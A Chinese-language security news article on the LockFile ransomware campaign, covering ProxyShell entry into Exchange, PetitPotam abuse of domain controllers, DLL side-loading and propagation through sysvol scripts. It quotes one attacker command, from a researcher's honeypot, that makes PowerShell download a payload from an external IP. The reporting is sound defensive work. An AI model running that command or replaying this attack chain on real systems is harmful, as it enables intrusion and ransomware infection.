新的勒索软件攻击大肆滥用近期公开的重大漏洞,而使得企业与组织难以招架。例如,赛门铁克披露一起名为LockFile勒索软件的攻击行动,其中攻击者先是经由Exchange邮件服务器,入侵企业内部网络环境,接下来再借着PetitPotam漏洞(CVE-2021-36942),控制AD域名服务器,并感染内网的计算机。
这起攻击行动赛门铁克最早在7月20日发现,受害者是美国的金融组织,而该公司看到最新的攻击出现于8月20日,至少有10个组织遭到LockFile攻击,受害组织遍及全世界,但多数字于美国及亚洲。
对于LockFile受害组织的类型,包括制造业、金融服务、工程公司、法务公司、商业服务,以及旅游业等。
至于攻击者的身份为何?赛门铁克指出,根据黑客留下来的勒索消息中,提供受害者联系的电子邮件信箱contact@contipauper“.”com,可能是与Conti相关的黑客组织所为。而这个勒索消息的画面,也与日前攻击大型IT顾问公司Accenture的LockBit极为相似,但这两个勒索软件之间是否有所关联?赛门铁克没有进一步说明。
针对于LockFile攻击的过程,赛门铁克提出进一步的说明。攻击者先是入侵Exchange邮件服务器,并下达PowerShell命令,试图使用Wget程序下载文件,但究竟攻击者下载了什么?赛门铁克表示不得而知,仅表示在发动勒索软件攻击之前,黑客会维持访问受害组织的网络数日。
直到即将植入勒索软件的前20至30分钟,攻击者会在上述遭到入侵的Exchange邮件服务器上,开始部署一组工具,分别是efspotato.exe、active_desktop_render.dll,以及active_desktop_launcher.exe等3个文件。
其中,efspotato.exe是PetitPotam漏洞的滥用工具,疑似来自GitHub上的概念性验证(PoC)工具;而active_desktop_launcher.exe是合法应用程序,它是中国酷狗音乐所推出的动态桌面软件(KuGou Active Desktop),攻击者将它用来侧载恶意程序库active_desktop_render.dll。
这个恶意DLL一旦被成功加载,就会企图解密服务器本机上一个名为desktop.ini的文件。如果这个INI文件成功解密,将会执行Shellcode。赛门铁克表示,目前他们尚未取得这个desktop.ini进行分析,而无法进一步说明过程中执行了那些行为。
而赛门铁克推测,这个加密Shellcode的用途,应该就是启动efspotato.exe,滥用PetitPotam漏洞攻击AD域名服务器。该公司强调,虽然微软已于8月的例行修补(Patch Tuesday)提供修补程序,但随后有安全研究人员指出,修补程序并未完全修补这项漏洞,而能够在已经安装修补程序的Windows服务器上重现。
一旦成功访问AD域名服务器,攻击者就会在域名服务器的指定文件夹(sysvol\domain\scripts)中,“部署”LockFile勒索软件相关文件,而上述提及的文件夹路径,就是所有的网络用户向域名控制器执行身份验证时,用来部署脚本(Script)的文件夹。换言之,只要计算机用户登录域名,计算机就会复制LockFile的文件并且执行,将计算机的文件加密。
披露此事的赛门铁克表明,本次攻击行动仍有多处细节仍不明朗,尤其是攻击者入侵Exchange服务器的手法,仍有待调查。不过,有安全研究人员根据蜜罐(Honeypot)所收集的情报,指出LockFile攻击者就是利用ProxyShell漏洞来下手。
安全研究人员Kevin Beaumont于8月21日指出,他的蜜罐在8月13日,侦测到滥用ProxyShell漏洞的攻击行动,黑客试图在蜜罐植入Webshell,而且,多数杀毒软件无法识别这个Webshell文件有害。这个攻击引起Kevin Beaumont注意的原因,就是攻击来源IP地址与赛门铁克披露的一致。
时隔3日,Kevin Beaumont看到黑客再度入侵蜜罐,并且下达新的攻击命令与植入LockFile文件。也就是说,攻击者最初入侵Exchange服务器的手段,就是滥用ProxyShell漏洞。
Another ProxyShell attack, actions on target:
“C:\Windows\System32\cmd.exe” /c powershell wgethttp://209.14.0.234:55676/P0BV1KrEwh8Xgeo6ctNqhttps://t.co/5YxPBYPt9F
—Kevin Beaumont (@GossiTheDog)August 16, 2021
针对这项发现,Kevin Beaumont指出,虽然这组漏洞微软已于4月发布修补程序,但相较于另一组在3月修补的重大漏洞ProxyLogon,他认为攻击者滥用ProxyShell的门槛较低,而且大型组织很可能还没有安装修补程序,而导致攻击者能轻易入侵Exchange服务器。而ProxyShell已被黑客大肆滥用的现象,也使得美国网络安全及基础设施安全局(CISA)提出呼吁,企业应尽快修补Exchange服务器。
对于LockFile勒索软件攻击滥用ProxyShell漏洞的行为,也有另一家安全企业TG Soft披露他们的看法,并公布了攻击流程图,指出攻击者在使用了efspotato.exe之后,使用了Vatet Loader来加载渗透测试工具Cobalt Strike,进而变动群组原则来传播勒索软件LockFile。
